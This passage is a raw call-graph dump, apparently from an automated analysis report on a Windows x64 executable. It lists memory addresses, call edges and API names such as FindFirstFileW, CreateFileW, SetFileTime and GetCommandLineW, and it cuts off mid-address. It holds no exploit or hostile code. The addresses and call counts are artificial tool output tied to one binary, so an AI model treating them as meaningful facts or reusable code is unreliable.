27295->26695 27298 7ff71612d25e 27296->27298 27297 7ff71612d292 27297->26696 27298->27297 27299 7ff716111744 33 API calls 27298->27299 27299->27298 27300->26592 27301->26582 27303->26563 27304->26566 27305->26568 27306->26622 27307->26611 27309->26612 27311->27173 27312->27180 27313->27193 27314->27210 27315->27220 27316->27242 27317->27246 27318->27240 27320 7ff71611b3f2 memcpy_s 27319->27320 27321 7ff716142320 _handle_error 8 API calls 27320->27321 27322 7ff71611b4b6 27321->27322 27322->26695 27323->27292 27380 7ff7161286ec 27324->27380 27326 7ff71611e3c4 27390 7ff71611e600 27326->27390 27328 7ff71611e4d4 27331 7ff7161421d0 33 API calls 27328->27331 27329 7ff71611e549 27332 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27329->27332 27330 7ff71611e454 27330->27328 27330->27329 27333 7ff71611e4f0 27331->27333 27336 7ff71611e54e 27332->27336 27396 7ff716133148 102 API calls 27333->27396 27335 7ff71611e51d 27337 7ff716142320 _handle_error 8 API calls 27335->27337 27338 7ff7161218c2 27336->27338 27340 7ff71612190d 27336->27340 27342 7ff716111fa0 31 API calls 27336->27342 27339 7ff71611e52d 27337->27339 27338->27340 27341 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27338->27341 27339->26712 27340->26712 27343 7ff71612193b 27341->27343 27342->27336 27345 7ff71611e7ea 27344->27345 27346 7ff71611e864 27345->27346 27348 7ff71611e8a1 27345->27348 27412 7ff716123ec8 27345->27412 27346->27348 27349 7ff71611e993 27346->27349 27356 7ff71611e900 27348->27356 27419 7ff71611f578 27348->27419 27350 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27349->27350 27354 7ff71611e998 27350->27354 27351 7ff71611e955 27353 7ff716142320 _handle_error 8 API calls 27351->27353 27355 7ff71611e97e 27353->27355 27358 7ff71611e578 27355->27358 27356->27351 27455 7ff7161128a4 82 API calls 2 library calls 27356->27455 28474 7ff7161215d8 27358->28474 27361 7ff71611e59e 27363 7ff716111fa0 31 API calls 27361->27363 27362 7ff716131870 108 API calls 27362->27361 27364 7ff71611e5b7 27363->27364 27365 7ff716111fa0 31 API calls 27364->27365 27366 7ff71611e5c3 27365->27366 27367 7ff716111fa0 31 API calls 27366->27367 27368 7ff71611e5cf 27367->27368 27369 7ff71612878c 108 API calls 27368->27369 27370 7ff71611e5db 27369->27370 27371 7ff716111fa0 31 API calls 27370->27371 27372 7ff71611e5e4 27371->27372 27373 7ff716111fa0 31 API calls 27372->27373 27374 7ff71611e5ed 27373->27374 27375 7ff71612190d 27374->27375 27376 7ff7161218c2 27374->27376 27377 7ff716111fa0 31 API calls 27374->27377 27375->26716 27376->27375 27378 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27376->27378 27377->27374 27379 7ff71612193b 27378->27379 27381 7ff71612870a 27380->27381 27382 7ff7161421d0 33 API calls 27381->27382 27383 7ff71612872f 27382->27383 27385 7ff716128743 27383->27385 27397 7ff716119f1c 27383->27397 27386 7ff7161421d0 33 API calls 27385->27386 27387 7ff716128759 27386->27387 27388 7ff71612876b 27387->27388 27389 7ff716119f1c 33 API calls 27387->27389 27388->27326 27389->27388 27391 7ff71611e627 27390->27391 27393 7ff71611e62c BuildCatchObjectHelperInternal 27390->27393 27394 7ff716111fa0 31 API calls 27391->27394 27392 7ff71611e668 BuildCatchObjectHelperInternal 27392->27330 27393->27392 27395 7ff716111fa0 31 API calls 27393->27395 27394->27393 27395->27392 27396->27335 27402 7ff7161424a0 27397->27402 27400 7ff7161424a0 33 API calls 27401 7ff716119f75 memcpy_s 27400->27401 27401->27385 27403 7ff7161424d1 27402->27403 27404 7ff716119f4a 27403->27404 27406 7ff716119fb0 27403->27406 27404->27400 27409 7ff71612b788 27406->27409 27408 7ff716119fc2 27408->27403 27410 7ff7161113a4 33 API calls 27409->27410 27411 7ff71612b7ad 27410->27411 27411->27408 27413 7ff7161272cc 8 API calls 27412->27413 27414 7ff716123ee1 27413->27414 27415 7ff716123f0f 27414->27415 27456 7ff7161240bc 27414->27456 27415->27345 27418 7ff716123efa FindClose 27418->27415 27420 7ff71611f598 _snwprintf 27419->27420 27495 7ff716112950 27420->27495 27423 7ff71611f5cc 27428 7ff71611f5fc 27423->27428 27512 7ff7161133e4 27423->27512 27426 7ff71611f5f8 27426->27428 27544 7ff716113ad8 27426->27544 27763 7ff716112c54 27428->27763 27434 7ff71611f7cb 27554 7ff71611f8a4 27434->27554 27435 7ff716118d04 33 API calls 27437 7ff71611f662 27435->27437 27783 7ff716127918 48 API calls 2 library calls 27437->27783 27439 7ff71611f677 27440 7ff716123ec8 55 API calls 27439->27440 27447 7ff71611f6ad 27440->27447 27442 7ff71611f842 27442->27428 27575 7ff7161169f8 27442->27575 27586 7ff71611f930 27442->27586 27448 7ff71611f89a 27447->27448 27449 7ff71611f74d 27447->27449 27450 7ff716123ec8 55 API calls 27447->27450 27784 7ff716127918 48 API calls 2 library calls 27447->27784 27451 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27448->27451 27449->27434 27449->27448 27452 7ff71611f895 27449->27452 27450->27447 27454 7ff71611f8a0 27451->27454 27453 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27452->27453 27453->27448 27455->27351 27457 7ff7161240f9 FindFirstFileW 27456->27457 27458 7ff7161241d2 FindNextFileW 27456->27458 27461 7ff7161241f3 27457->27461 27463 7ff71612411e 27457->27463 27460 7ff7161241e1 GetLastError 27458->27460 27458->27461 27476 7ff7161241c0 27460->27476 27462 7ff716124211 27461->27462 27466 7ff7161120b0 33 API calls 27461->27466 27470 7ff71611129c 33 API calls 27462->27470 27464 7ff716126a0c 49 API calls 27463->27464 27465 7ff716124144 27464->27465 27468 7ff716124148 FindFirstFileW 27465->27468 27469 7ff716124167 27465->27469 27466->27462 27467 7ff716142320 _handle_error 8 API calls 27471 7ff716123ef4 27467->27471 27468->27469 27469->27461 27473 7ff7161241af GetLastError 27469->27473 27481 7ff716124314 27469->27481 27472 7ff71612423b 27470->27472 27471->27415 27471->27418 27482 7ff716128090 27472->27482 27473->27476 27476->27467 27477 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27478 7ff71612431a 27477->27478 27479 7ff71612430f 27480 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27479->27480 27480->27481 27481->27477 27483 7ff7161280a5 27482->27483 27486 7ff716128188 27483->27486 27485 7ff716124249 27485->27476 27485->27479 27487 7ff716128326 27486->27487 27490 7ff7161281ba 27486->27490 27494 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 27487->27494 27489 7ff71612832b 27492 7ff7161281d4 BuildCatchObjectHelperInternal 27490->27492 27493 7ff7161258a4 33 API calls 2 library calls 27490->27493 27492->27485 27493->27492 27494->27489 27496 7ff71611296c 27495->27496 27497 7ff716119f1c 33 API calls 27496->27497 27498 7ff716112980 27497->27498 27499 7ff7161286ec 33 API calls 27498->27499 27500 7ff71611298d 27499->27500 27501 7ff716112ac2 27500->27501 27502 7ff7161421d0 33 API calls 27500->27502 27792 7ff716124d04 27501->27792 27504 7ff716112ab0 27502->27504 27504->27501 27785 7ff7161191c8 27504->27785 27507 7ff716122ca8 27821 7ff7161224c0 27507->27821 27510 7ff716122cc5 27510->27423 27840 7ff7161228d0 27512->27840 27513 7ff716113674 27859 7ff7161128a4 82 API calls 2 library calls 27513->27859 27514 7ff716113431 memcpy_s 27522 7ff71611344e 27514->27522 27525 7ff716113601 27514->27525 27845 7ff716122bb0 27514->27845 27516 7ff7161169f8 141 API calls 27518 7ff716113682 27516->27518 27518->27516 27519 7ff71611370c 27518->27519 27518->27525 27535 7ff716122aa0 101 API calls 27518->27535 27523 7ff716113740 27519->27523 27519->27525 27860 7ff7161128a4 82 API calls 2 library calls 27519->27860 27521 7ff7161135cb 27521->27522 27524 7ff7161135d7 27521->27524 27522->27513 27522->27518 27523->27525 27526 7ff71611384d 27523->27526 27537 7ff716122bb0 101 API calls 27523->27537 27524->27525 27527 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27524->27527 27525->27426 27526->27525 27529 7ff7161120b0 33 API calls 27526->27529 27530 7ff716113891 27527->27530 27528 7ff7161134eb 27528->27521 27854 7ff716122aa0 27528->27854 27529->27525 27530->27426 27532 7ff7161169f8 141 API calls 27533 7ff71611378e 27532->27533 27533->27532 27534 7ff716113803 27533->27534 27538 7ff716122aa0 101 API calls 27533->27538 27542 7ff716122aa0 101 API calls 27534->27542 27535->27518 27536 7ff7161228d0 104 API calls 27536->27521 27537->27533 27538->27533 27542->27526 27543 7ff7161228d0 104 API calls 27543->27528 27545 7ff716113af9 27544->27545 27546 7ff716113b55 27544->27546 27872 7ff716113378 27545->27872 27547 7ff716142320 _handle_error 8 API calls 27546->27547 27550 7ff716113b67 27547->27550 27550->27434 27550->27435 27551 7ff716113b6c 27552 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27551->27552 27553 7ff716113b71 27552->27553 28097 7ff71612886c 27554->28097 27556 7ff71611f8ba 28101 7ff71612ef60 GetSystemTime SystemTimeToFileTime 27556->28101 27559 7ff716130994 27560 7ff716140340 27559->27560 27561 7ff716127df4 47 API calls 27560->27561 27562 7ff716140373 27561->27562 27563 7ff71612aae0 48 API calls 27562->27563 27564 7ff716140387 27563->27564 27565 7ff71612da98 48 API calls 27564->27565 27566 7ff716140397 27565->27566 27567 7ff716111fa0 31 API calls 27566->27567 27568 7ff7161403a2 27567->27568 28110 7ff71613fc68 49 API calls 2 library calls 27568->28110 27570 7ff7161403b8 27571 7ff716111fa0 31 API calls 27570->27571 27572 7ff7161403c3 27571->27572 27573 7ff716142320 _handle_error 8 API calls 27572->27573 27574 7ff7161403d0 27573->27574 27574->27442 27576 7ff716116a0e 27575->27576 27580 7ff716116a0a 27575->27580 27585 7ff716122bb0 101 API calls 27576->27585 27577 7ff716116a1b 27578 7ff716116a3e 27577->27578 27579 7ff716116a2f 27577->27579 28194 7ff716115130 139 API calls 2 library calls 27578->28194 27579->27580 28111 7ff716115e24 27579->28111 27580->27442 27583 7ff716116a3c 27583->27580 28195 7ff71611466c 82 API calls 27583->28195 27585->27577 27587 7ff71611f978 27586->27587 27593 7ff71611f9b0 27587->27593 27647 7ff71611fa34 27587->27647 28317 7ff71613612c 146 API calls 3 library calls 27587->28317 27588 7ff716121189 27591 7ff71612118e 27588->27591 27592 7ff7161211e1 27588->27592 27590 7ff716142320 _handle_error 8 API calls 27594 7ff7161211c4 27590->27594 27591->27647 28365 7ff71611dd08 179 API calls 27591->28365 27592->27647 28366 7ff71613612c 146 API calls 3 library calls 27592->28366 27593->27588 27596 7ff71611f9d0 27593->27596 27593->27647 27594->27442 27596->27647 28232 7ff716119bb0 27596->28232 27599 7ff71611fad6 28245 7ff716125ef8 27599->28245 27647->27590 27764 7ff716112c74 27763->27764 27765 7ff716112c88 27763->27765 27764->27765 28453 7ff716112d80 108 API calls _invalid_parameter_noinfo_noreturn 27764->28453 27766 7ff716111fa0 31 API calls 27765->27766 27769 7ff716112ca1 27766->27769 27782 7ff716112d64 27769->27782 28454 7ff716113090 31 API calls _invalid_parameter_noinfo_noreturn 27769->28454 27770 7ff716112d08 28455 7ff716113090 31 API calls _invalid_parameter_noinfo_noreturn 27770->28455 27771 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27773 7ff716112d7c 27771->27773 27774 7ff716112d14 27775 7ff716111fa0 31 API calls 27774->27775 27776 7ff716112d20 27775->27776 28456 7ff71612878c 27776->28456 27782->27771 27783->27439 27784->27447 27802 7ff7161256a4 27785->27802 27787 7ff7161191df 27788 7ff71612b788 33 API calls 27787->27788 27789 7ff716119365 27788->27789 27805 7ff716119a28 27789->27805 27791 7ff716119383 27791->27501 27793 7ff716124d32 memcpy_s 27792->27793 27817 7ff716124bac 27793->27817 27795 7ff716124d54 27797 7ff716124dae 27795->27797 27798 7ff716124d90 27795->27798 27796 7ff716142320 _handle_error 8 API calls 27799 7ff716112b32 27796->27799 27800 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27797->27800 27798->27796 27799->27423 27799->27507 27801 7ff716124db3 27800->27801 27808 7ff7161256e8 27802->27808 27806 7ff7161256e8 2 API calls 27805->27806 27807 7ff716119a36 27806->27807 27807->27791 27809 7ff7161256fe memcpy_s 27808->27809 27812 7ff71612eba4 27809->27812 27815 7ff71612eb58 GetCurrentProcess GetProcessAffinityMask 27812->27815 27816 7ff7161256de 27815->27816 27816->27787 27818 7ff716124c27 27817->27818 27820 7ff716124c2f BuildCatchObjectHelperInternal 27817->27820 27819 7ff716111fa0 31 API calls 27818->27819 27819->27820 27820->27795 27822 7ff7161224fd CreateFileW 27821->27822 27824 7ff7161225ae GetLastError 27822->27824 27827 7ff71612266e 27822->27827 27825 7ff716126a0c 49 API calls 27824->27825 27826 7ff7161225dc 27825->27826 27828 7ff7161225e0 CreateFileW GetLastError 27826->27828 27833 7ff71612262c 27826->27833 27829 7ff7161226b1 SetFileTime 27827->27829 27831 7ff7161226cf 27827->27831 27828->27833 27829->27831 27830 7ff716122708 27832 7ff716142320 _handle_error 8 API calls 27830->27832 27831->27830 27835 7ff7161120b0 33 API calls 27831->27835 27834 7ff71612271b 27832->27834 27833->27827 27836 7ff716122736 27833->27836 27834->27510 27839 7ff71611b7e8 99 API calls 2 library calls 27834->27839 27835->27830 27837 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27836->27837 27838 7ff71612273b 27837->27838 27839->27510 27841 7ff7161228f6 27840->27841 27842 7ff7161228fd 27840->27842 27841->27514 27842->27841 27844 7ff716122320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27842->27844 27861 7ff71611b8a4 99 API calls std::_Xinvalid_argument 27842->27861 27844->27842 27846 7ff716122bcd 27845->27846 27847 7ff716122be9 27845->27847 27848 7ff7161134cc 27846->27848 27862 7ff71611b9c4 99 API calls std::_Xinvalid_argument 27846->27862 27847->27848 27850 7ff716122c01 SetFilePointer 27847->27850 27848->27543 27850->27848 27851 7ff716122c1e GetLastError 27850->27851 27851->27848 27852 7ff716122c28 27851->27852 27852->27848 27863 7ff71611b9c4 99 API calls std::_Xinvalid_argument 27852->27863 27864 7ff716122778 27854->27864 27856 7ff7161135a7 27856->27521 27856->27536 27859->27525 27860->27523 27870 7ff716122789 _snwprintf 27864->27870 27865 7ff716122890 SetFilePointer 27867 7ff7161227b5 27865->27867 27869 7ff7161228b8 GetLastError 27865->27869 27866 7ff716142320 _handle_error 8 API calls 27868 7ff71612281d 27866->27868 27867->27866 27868->27856 27871 7ff71611b9c4 99 API calls std::_Xinvalid_argument 27868->27871 27869->27867 27870->27865 27870->27867 27873 7ff71611339a 27872->27873 27876 7ff716113396 27872->27876 27878 7ff716113294 27873->27878 27876->27546 27876->27551 27877 7ff716122aa0 101 API calls 27877->27876 27879 7ff7161132bb 27878->27879 27880 7ff7161132f6 27878->27880 27881 7ff7161169f8 141 API calls 27879->27881 27886 7ff716116e74 27880->27886 27884 7ff7161132db 27881->27884 27884->27877 27890 7ff716116e95 27886->27890 27887 7ff7161169f8 141 API calls 27887->27890 27888 7ff71611331d 27888->27884 27891 7ff716113904 27888->27891 27890->27887 27890->27888 27918 7ff71612e808 27890->27918 27926 7ff716116a7c 27891->27926 27894 7ff71611396a 27897 7ff716113989 27894->27897 27898 7ff71611399a 27894->27898 27896 7ff716113a8a 27899 7ff716142320 _handle_error 8 API calls 27896->27899 27959 7ff716130d54 33 API calls 27897->27959 27903 7ff7161139ec 27898->27903 27904 7ff7161139a3 27898->27904 27902 7ff716113a9e 27899->27902 27900 7ff716113ab3 27905 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27900->27905 27902->27884 27961 7ff7161126b4 33 API calls BuildCatchObjectHelperInternal 27903->27961 27960 7ff716130c80 33 API calls 27904->27960 27907 7ff716113ab8 27905->27907 27913 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27907->27913 27908 7ff7161139b0 27910 7ff716111fa0 31 API calls 27908->27910 27915 7ff7161139c0 BuildCatchObjectHelperInternal 27908->27915 27910->27915 27911 7ff716111fa0 31 API calls 27917 7ff71611394f 27911->27917 27912 7ff716113a13 27962 7ff716130ae8 34 API calls _invalid_parameter_noinfo_noreturn 27912->27962 27914 7ff716113abe 27913->27914 27915->27911 27917->27896 27917->27900 27917->27907 27919 7ff71612e811 27918->27919 27922 7ff71612e82b 27919->27922 27924 7ff71611b664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27919->27924 27921 7ff71612e845 SetThreadExecutionState 27922->27921 27925 7ff71611b664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27922->27925 27924->27922 27925->27921 27927 7ff716116a96 _snwprintf 27926->27927 27928 7ff716116ae4 27927->27928 27929 7ff716116ac4 27927->27929 27931 7ff716116d4d 27928->27931 27934 7ff716116b0f 27928->27934 28001 7ff7161128a4 82 API calls 2 library calls 27929->28001 28030 7ff7161128a4 82 API calls 2 library calls 27931->28030 27933 7ff716116ad0 27935 7ff716142320 _handle_error 8 API calls 27933->27935 27934->27933 27963 7ff716131f94 27934->27963 27936 7ff71611394b 27935->27936 27936->27894 27936->27917 27958 7ff716112794 33 API calls __std_swap_ranges_trivially_swappable 27936->27958 27939 7ff716116b85 27940 7ff716116c2a 27939->27940 27957 7ff716116b7b 27939->27957 28007 7ff716128968 109 API calls 27939->28007 27972 7ff716124760 27940->27972 27941 7ff716116b6e 28002 7ff7161128a4 82 API calls 2 library calls 27941->28002 27942 7ff716116b80 27942->27939 28003 7ff7161140b0 27942->28003 27948 7ff716116c52 27949 7ff716116cc7 27948->27949 27950 7ff716116cd1 27948->27950 27976 7ff716121794 27949->27976 28008 7ff716131f20 27950->28008 27953 7ff716116ccf 28028 7ff716124700 8 API calls _handle_error 27953->28028 27991 7ff716131870 27957->27991 27958->27894 27959->27917 27960->27908 27961->27912 27962->27917 27964 7ff716131fc5 std::bad_alloc::bad_alloc 27963->27964 27965 7ff716132056 std::bad_alloc::bad_alloc 27963->27965 27966 7ff716116b59 27964->27966 27968 7ff71613200f std::bad_alloc::bad_alloc 27964->27968 27969 7ff716144078 std::_Xinvalid_argument 2 API calls 27964->27969 28031 7ff716144078 27965->28031 27966->27939 27966->27941 27966->27942 27968->27966 27970 7ff716144078 std::_Xinvalid_argument 2 API calls 27968->27970 27969->27968 27971 7ff7161320a9 27970->27971 27973 7ff716124780 27972->27973 27975 7ff71612478a 27972->27975 27974 7ff7161421d0 33 API calls 27973->27974 27974->27975 27975->27948 27977 7ff7161217be memcpy_s 27976->27977 28036 7ff716128a48 27977->28036 27980 7ff7161217f2 27992 7ff71613188e 27991->27992 27994 7ff7161318a1 27992->27994 28056 7ff71612e948 27992->28056 27998 7ff7161318d8 27994->27998 28052 7ff71614236c 27994->28052 27996 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 27997 7ff716131ad0 27996->27997 28000 7ff716131a37 27998->28000 28063 7ff71612a984 31 API calls _invalid_parameter_noinfo_noreturn 27998->28063 28000->27996 28001->27933 28002->27957 28004 7ff7161140d7 memcpy_s 28003->28004 28005 7ff7161140dd 28003->28005 28004->27939 28005->28004 28064 7ff716114120 33 API calls 2 library calls 28005->28064 28007->27940 28009 7ff716131f29 28008->28009 28010 7ff716131f5d 28009->28010 28011 7ff716131f55 28009->28011 28012 7ff716131f49 28009->28012 28010->27953 28088 7ff716133964 156 API calls 28011->28088 28065 7ff7161320ac 28012->28065 28030->27933 28032 7ff716144097 28031->28032 28033 7ff7161440b4 RtlPcToFileHeader 28031->28033 28032->28033 28034 7ff7161440cc 28033->28034 28035 7ff7161440db RaiseException 28033->28035 28034->28035 28035->27964 28037 7ff716128a91 BuildCatchObjectHelperInternal 28036->28037 28039 7ff716128bcd 28036->28039 28037->28039 28042 7ff716128c1f 28037->28042 28043 7ff71613612c 146 API calls 28037->28043 28044 7ff716124888 108 API calls 28037->28044 28045 7ff7161228d0 104 API calls 28037->28045 28038 7ff716128c1a 28040 7ff71612e808 SetThreadExecutionState RtlPcToFileHeader RaiseException 28038->28040 28039->28038 28041 7ff71611a174 8 API calls 28039->28041 28040->28042 28041->28038 28042->27980 28043->28037 28044->28037 28045->28037 28053 7ff71614239f 28052->28053 28054 7ff7161423c8 28053->28054 28055 7ff716131870 108 API calls 28053->28055 28054->27998 28055->28053 28057 7ff71612ecd8 103 API calls 28056->28057 28058 7ff71612e95f ReleaseSemaphore 28057->28058 28059 7ff71612e9a3 DeleteCriticalSection CloseHandle CloseHandle 28058->28059 28060 7ff71612e984 28058->28060 28061 7ff71612ea5c 101 API calls 28060->28061 28062 7ff71612e98e FindCloseChangeNotification 28061->28062 28062->28059 28062->28060 28063->28000 28067 7ff7161320c8 memcpy_s 28065->28067 28066 7ff7161321ba 28067->28066 28068 7ff7161424a0 33 API calls 28067->28068 28069 7ff716132155 memcpy_s 28067->28069 28068->28069 28069->28066 28088->28010 28098 7ff716128882 28097->28098 28099 7ff716128892 28097->28099 28104 7ff7161223f0 28098->28104 28099->27556 28102 7ff716142320 _handle_error 8 API calls 28101->28102 28103 7ff71611f7dc 28102->28103 28103->27442 28103->27559 28105 7ff71612240f 28104->28105 28108 7ff716122aa0 101 API calls 28105->28108 28106 7ff716122428 28109 7ff716122bb0 101 API calls 28106->28109 28107 7ff716122438 28107->28099 28108->28106 28109->28107 28110->27570 28112 7ff716115e67 28111->28112 28113 7ff716115ea5 28112->28113 28118 7ff716115eb7 28112->28118 28142 7ff716116084 28112->28142 28206 7ff7161128a4 82 API calls 2 library calls 28113->28206 28116 7ff716116134 28213 7ff716116fcc 82 API calls 28116->28213 28118->28116 28119 7ff716115f44 28118->28119 28207 7ff716116f38 33 API calls BuildCatchObjectHelperInternal 28118->28207 28208 7ff716116d88 82 API calls 28119->28208 28120 7ff7161169af 28122 7ff716142320 _handle_error 8 API calls 28120->28122 28125 7ff7161169c3 28122->28125 28124 7ff7161169e4 28126 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28124->28126 28125->27583 28130 7ff7161169e9 28126->28130 28127 7ff716116973 28190 7ff716115eb2 28127->28190 28226 7ff71611466c 82 API calls 28127->28226 28132 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28130->28132 28131 7ff71611612e 28131->28116 28131->28127 28135 7ff7161285f0 104 API calls 28131->28135 28134 7ff7161169ef 28132->28134 28133 7ff716116034 28137 7ff71614236c 108 API calls 28133->28137 28133->28142 28138 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28134->28138 28136 7ff7161161a4 28135->28136 28136->28116 28147 7ff7161161ac 28136->28147 28139 7ff71611606e 28137->28139 28140 7ff7161169f5 28138->28140 28141 7ff71614236c 108 API calls 28139->28141 28141->28142 28196 7ff7161285f0 28142->28196 28143 7ff716116097 28212 7ff71611433c 82 API calls 2 library calls 28143->28212 28146 7ff716115f5d 28146->28133 28146->28143 28209 7ff71611433c 82 API calls 2 library calls 28146->28209 28210 7ff716116d88 82 API calls 28146->28210 28211 7ff71611a1a0 109 API calls _handle_error 28146->28211 28148 7ff71611623f 28147->28148 28214 7ff71611466c 82 API calls 28147->28214 28148->28127 28150 7ff7161160a1 28152 7ff71614236c 108 API calls 28150->28152 28150->28190 28190->28120 28190->28124 28190->28134 28194->27583 28197 7ff71612869a 28196->28197 28198 7ff716128614 28196->28198 28199 7ff71612867c 28197->28199 28201 7ff7161140b0 33 API calls 28197->28201 28198->28199 28200 7ff7161140b0 33 API calls 28198->28200 28199->28131 28202 7ff71612864d 28200->28202 28203 7ff7161286b3 28201->28203 28227 7ff71611a174 28202->28227 28205 7ff7161228d0 104 API calls 28203->28205 28205->28199 28206->28190 28208->28146 28209->28146 28210->28146 28211->28146 28212->28150 28213->28190 28228 7ff71611a185 28227->28228 28229 7ff71611a19a 28228->28229 28231 7ff71612af18 8 API calls 2 library calls 28228->28231 28229->28199 28231->28229 28240 7ff716119be7 28232->28240 28233 7ff716119c1b 28234 7ff716142320 _handle_error 8 API calls 28233->28234 28235 7ff716119c9d 28234->28235 28235->27599 28237 7ff716119c83 28238 7ff716111fa0 31 API calls 28237->28238 28238->28233 28240->28233 28240->28237 28241 7ff716119cae 28240->28241 28367 7ff716125294 28240->28367 28385 7ff71612db60 28240->28385 28242 7ff716119cbf 28241->28242 28389 7ff71612da48 CompareStringW 28241->28389 28242->28237 28244 7ff7161120b0 33 API calls 28242->28244 28244->28237 28258 7ff716125f3a 28245->28258 28246 7ff716142320 _handle_error 8 API calls 28248 7ff71611fb29 28246->28248 28249 7ff7161261d4 28250 7ff71611129c 33 API calls 28251 7ff716126129 28250->28251 28252 7ff716111fa0 31 API calls 28251->28252 28253 7ff71612613b BuildCatchObjectHelperInternal 28251->28253 28252->28253 28254 7ff71612619b 28253->28254 28254->28246 28257 7ff7161261ce 28393 7ff71611704c 47 API calls BuildCatchObjectHelperInternal 28257->28393 28258->28250 28258->28254 28258->28257 28317->27593 28365->27647 28366->27647 28368 7ff7161252d4 28367->28368 28372 7ff716125312 __vcrt_FlsAlloc 28368->28372 28381 7ff716125339 __vcrt_FlsAlloc 28368->28381 28390 7ff7161313f4 CompareStringW 28368->28390 28369 7ff716142320 _handle_error 8 API calls 28370 7ff716125503 28369->28370 28370->28240 28374 7ff716125382 __vcrt_FlsAlloc 28372->28374 28372->28381 28391 7ff7161313f4 CompareStringW 28372->28391 28375 7ff716125439 28374->28375 28376 7ff71611129c 33 API calls 28374->28376 28374->28381 28379 7ff71612551b 28375->28379 28380 7ff716125489 28375->28380 28377 7ff716125426 28376->28377 28378 7ff7161272cc 8 API calls 28377->28378 28378->28375 28383 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28379->28383 28380->28381 28392 7ff7161313f4 CompareStringW 28380->28392 28381->28369 28384 7ff716125520 28383->28384 28387 7ff71612db73 28385->28387 28386 7ff71612db91 28386->28240 28387->28386 28388 7ff7161120b0 33 API calls 28387->28388 28388->28386 28389->28242 28390->28372 28391->28374 28392->28381 28393->28249 28453->27765 28454->27770 28455->27774 28457 7ff7161287af 28456->28457 28458 7ff7161287df 28456->28458 28459 7ff71614236c 108 API calls 28457->28459 28460 7ff71614236c 108 API calls 28458->28460 28468 7ff71612882b 28458->28468 28462 7ff7161287ca 28459->28462 28463 7ff716128814 28460->28463 28465 7ff71614236c 108 API calls 28462->28465 28466 7ff71614236c 108 API calls 28463->28466 28464 7ff716128845 28467 7ff71612461c 108 API calls 28464->28467 28465->28458 28466->28468 28469 7ff716128851 28467->28469 28470 7ff71612461c 28468->28470 28471 7ff716124632 28470->28471 28473 7ff71612463a 28470->28473 28472 7ff71612e948 108 API calls 28471->28472 28472->28473 28473->28464 28475 7ff71612163e 28474->28475 28479 7ff716121681 28474->28479 28475->28479 28480 7ff7161231bc 51 API calls 28475->28480 28476 7ff7161216a0 28478 7ff71611e600 31 API calls 28476->28478 28477 7ff716111fa0 31 API calls 28477->28479 28484 7ff7161216de 28478->28484 28479->28476 28479->28477 28480->28475 28481 7ff71612175b 28482 7ff716142320 _handle_error 8 API calls 28481->28482 28485 7ff71611e58a 28482->28485 28483 7ff71612178d 28486 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28483->28486 28484->28481 28484->28483 28485->27361 28485->27362 28487 7ff716121792 28486->28487 28489 7ff7161384cc 4 API calls 28488->28489 28491 7ff7161384aa 28489->28491 28490 7ff7161384b9 28490->26723 28490->26724 28491->28490 28500 7ff716138504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28491->28500 28493->26726 28494->26735 28496 7ff7161384e3 28495->28496 28497 7ff7161384de 28495->28497 28496->26735 28501 7ff716138590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28497->28501 28499->26738 28500->28490 28501->28496 28502->26758 28504->26788 28505->26804 28506->26811 28508->26816 28566 7ff716140df5 14 API calls _com_raise_error 28567 7ff716142d6c 28592 7ff7161427fc 28567->28592 28570 7ff716142eb8 28691 7ff716143170 7 API calls 2 library calls 28570->28691 28571 7ff716142d88 __scrt_acquire_startup_lock 28573 7ff716142ec2 28571->28573 28576 7ff716142da6 28571->28576 28692 7ff716143170 7 API calls 2 library calls 28573->28692 28575 7ff716142dcb 28576->28575 28580 7ff716142de8 __scrt_release_startup_lock 28576->28580 28600 7ff71614cd90 28576->28600 28577 7ff716142ecd abort 28579 7ff716142e51 28604 7ff7161432bc 28579->28604 28580->28579 28688 7ff71614c050 35 API calls __GSHandlerCheck_EH 28580->28688 28582 7ff716142e56 28607 7ff71614cd20 28582->28607 28693 7ff716142fb0 28592->28693 28595 7ff716142827 28595->28570 28595->28571 28596 7ff71614282b 28695 7ff71614cc50 28596->28695 28601 7ff71614cdeb 28600->28601 28602 7ff71614cdcc 28600->28602 28601->28580 28602->28601 28712 7ff716111120 28602->28712 28605 7ff716143cf0 memcpy_s 28604->28605 28606 7ff7161432d3 GetStartupInfoW 28605->28606 28606->28582 28718 7ff716150730 28607->28718 28609 7ff71614cd2f 28610 7ff716142e5e 28609->28610 28722 7ff716150ac0 35 API calls swprintf 28609->28722 28612 7ff716140754 28610->28612 28724 7ff71612dfd0 28612->28724 28615 7ff7161262dc 35 API calls 28616 7ff71614079a 28615->28616 28801 7ff71613946c 28616->28801 28618 7ff7161407a4 memcpy_s 28806 7ff716139a14 28618->28806 28620 7ff716140819 28621 7ff71614096e GetCommandLineW 28620->28621 28670 7ff716140ddc 28620->28670 28627 7ff716140980 28621->28627 28663 7ff716140b42 28621->28663 28622 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28623 7ff716140de2 28622->28623 28626 7ff716147904 _invalid_parameter_noinfo_noreturn 31 API calls 28623->28626 28624 7ff716126454 34 API calls 28625 